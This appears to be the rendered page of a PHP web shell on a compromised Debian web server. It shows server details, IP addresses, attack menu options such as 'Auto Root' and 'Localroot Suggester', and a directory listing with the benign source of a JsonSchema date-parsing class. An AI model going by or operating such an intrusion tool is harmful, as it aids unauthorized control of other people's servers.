Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
php /
JsonSchema /
Delete
Unzip
Name
Size
Permission
Date
Action
Constraints
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Entity
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Exception
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Iterator
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Uri
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
Rfc3339.php
886
B
-rw-r--r--
2022-04-13 08:02
SchemaStorage.php
5.29
KB
-rw-r--r--
2022-04-13 08:02
SchemaStorageInterface.php
802
B
-rw-r--r--
2022-04-13 08:02
UriResolverInterface.php
530
B
-rw-r--r--
2022-04-13 08:02
UriRetrieverInterface.php
517
B
-rw-r--r--
2022-04-13 08:02
Validator.php
2.73
KB
-rw-r--r--
2022-04-13 08:02
autoload.php
4.58
KB
-rw-r--r--
2022-08-28 11:56
Save
Rename
<?php namespace JsonSchema; class Rfc3339 { const REGEX = '/^(\d{4}-\d{2}-\d{2}[T ]{1}\d{2}:\d{2}:\d{2})(\.\d+)?(Z|([+-]\d{2}):?(\d{2}))$/'; /** * Try creating a DateTime instance * * @param string $string * * @return \DateTime|null */ public static function createFromString($string) { if (!preg_match(self::REGEX, strtoupper($string), $matches)) { return null; } $dateAndTime = $matches[1]; $microseconds = $matches[2] ?: '.000000'; $timeZone = 'Z' !== $matches[3] ? $matches[4] . ':' . $matches[5] : '+00:00'; $dateFormat = strpos($dateAndTime, 'T') === false ? 'Y-m-d H:i:s.uP' : 'Y-m-d\TH:i:s.uP'; $dateTime = \DateTime::createFromFormat($dateFormat, $dateAndTime . $microseconds . $timeZone, new \DateTimeZone('UTC')); return $dateTime ?: null; } }